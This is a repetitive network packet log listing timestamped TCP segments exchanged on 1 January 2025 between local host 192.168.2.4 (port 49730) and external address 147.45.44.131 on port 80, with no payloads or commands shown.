Jan 1, 2025 08:54:02.284693956 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284704924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284754038 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284836054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284847021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284857035 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284868002 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284878016 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284885883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284894943 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284900904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284914017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284924030 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284934044 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284956932 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284956932 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285022974 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285207033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285218954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285228968 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285239935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285249949 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285259962 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285271883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285278082 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285278082 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285331011 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285521984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285532951 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285564899 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285695076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285712004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285722017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285732031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285737038 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285742998 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285754919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285764933 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285773993 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285778046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285789013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285799980 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285809040 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285816908 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285819054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285831928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285840034 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285840034 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285841942 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285852909 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285862923 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285865068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285877943 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.285913944 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.285948038 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.286537886 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286549091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286559105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286569118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286580086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286590099 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286601067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286607981 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.286607981 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.286612034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286623001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286633015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286643982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286647081 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.286654949 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286670923 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286679983 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.286679983 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.286680937 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286693096 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286704063 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.286726952 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.286726952 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.286758900 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.287173033 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.287184954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287195921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287205935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287216902 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287226915 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287236929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287240028 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.287249088 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287264109 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287266016 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.287283897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287293911 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287305117 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287308931 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.287308931 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.287322044 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287333012 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287338018 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.287343979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287360907 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287370920 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287380934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287390947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287400007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287406921 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.287406921 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.287411928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.287446022 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.287456989 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.288227081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288238049 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288247108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288264036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288273096 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288283110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288294077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288299084 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.288305044 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288316011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288321972 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.288326979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288336992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288347006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288347960 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.288347960 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.288357019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288368940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288378954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288388968 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288399935 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.288399935 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.288400888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288413048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288424015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288431883 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.288434982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288445950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288451910 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.288456917 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.288480043 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.288480043 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.288518906 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377509117 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377522945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377595901 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377657890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377670050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377680063 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377691031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377705097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377712965 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377717972 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377728939 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377738953 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377748013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377758026 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377768040 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377778053 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377780914 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377780914 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377789021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377806902 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377819061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377827883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377839088 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377845049 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377851009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377862930 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377865076 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377875090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377886057 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377892017 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377896070 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377903938 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377908945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377924919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377933025 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377937078 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377947092 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377948999 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377958059 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377968073 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377986908 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.377995014 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.377995968 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378006935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378007889 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378020048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378036976 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378076077 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378076077 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378137112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378149033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378160000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378170013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378180981 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378191948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378205061 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378205061 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378264904 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378590107 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378635883 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378730059 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378741980 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378751993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378762960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378773928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378783941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378793955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378806114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378806114 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378806114 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378817081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378827095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378837109 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378845930 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378854990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378859997 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378859997 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378871918 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378880024 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378884077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378895998 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378907919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.378921986 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.378935099 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.379719973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379730940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379743099 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379755020 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379765987 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379776001 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.379817009 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.379858017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379870892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379882097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379893064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379903078 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379913092 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379923105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379930973 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.379934072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379946947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379956961 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379966974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.379971981 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.379971981 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.380019903 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.380665064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380676985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380695105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380706072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380717039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380721092 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.380728960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380740881 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380768061 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.380768061 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.380820036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380831957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380842924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380853891 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380863905 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380870104 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.380870104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380870104 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.380877018 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380882978 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380892038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380904913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380916119 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380923986 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.380927086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380939007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.380968094 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.380968094 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.381792068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381803989 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381813049 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381824017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381834030 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381839991 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.381846905 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381858110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381865025 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.381870031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381880999 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381891012 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381902933 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381903887 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.381903887 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.381932020 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.381934881 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381947994 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381958008 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381958961 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.381972075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381983042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.381990910 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.381997108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.382009983 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.382019997 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.382030964 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.382039070 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.382039070 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.382041931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.382081032 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.382155895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.433890104 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.465964079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466017962 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466027021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466038942 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466073990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466094017 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466134071 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466162920 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466175079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466185093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466196060 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466238022 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466300964 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466336966 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466336966 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466372967 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466384888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466402054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466412067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466433048 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466453075 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466573000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466584921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466600895 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466609955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466620922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466625929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466636896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.466644049 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466695070 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.466847897 CET	80	49730	147.45.44.131	192.168.2.4
